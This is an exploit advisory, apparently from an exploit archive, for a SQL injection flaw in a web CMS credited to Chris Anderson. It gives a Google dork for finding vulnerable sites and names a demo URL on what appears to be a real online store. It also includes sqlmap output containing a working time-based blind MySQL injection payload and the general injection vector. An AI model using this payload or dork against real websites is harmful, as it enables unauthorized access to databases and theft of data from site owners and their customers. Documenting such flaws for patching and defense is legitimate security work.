#Exploit Title: Chris Anderson CMS SQL Injection Vulnerability
#Date: 2020-10-04
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: c-h-r-i-s.co.uk
#Google Dork: " Design by Chris Anderson "
#Category: webapps
#Tested On: windows 10, Firefox
SQL Injection
Demo: https://waxoasis.com/store/product.php?id=103[SQL Injection Vulnerability]&name=ancient-temple16-oz
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=103' AND (SELECT 8779 FROM (SELECT(SLEEP(5)))fuXD) AND 'gIvL'='gIvL&name=ancient-temple16-oz
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[INFO] the back-end DBMS is MySQL
*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************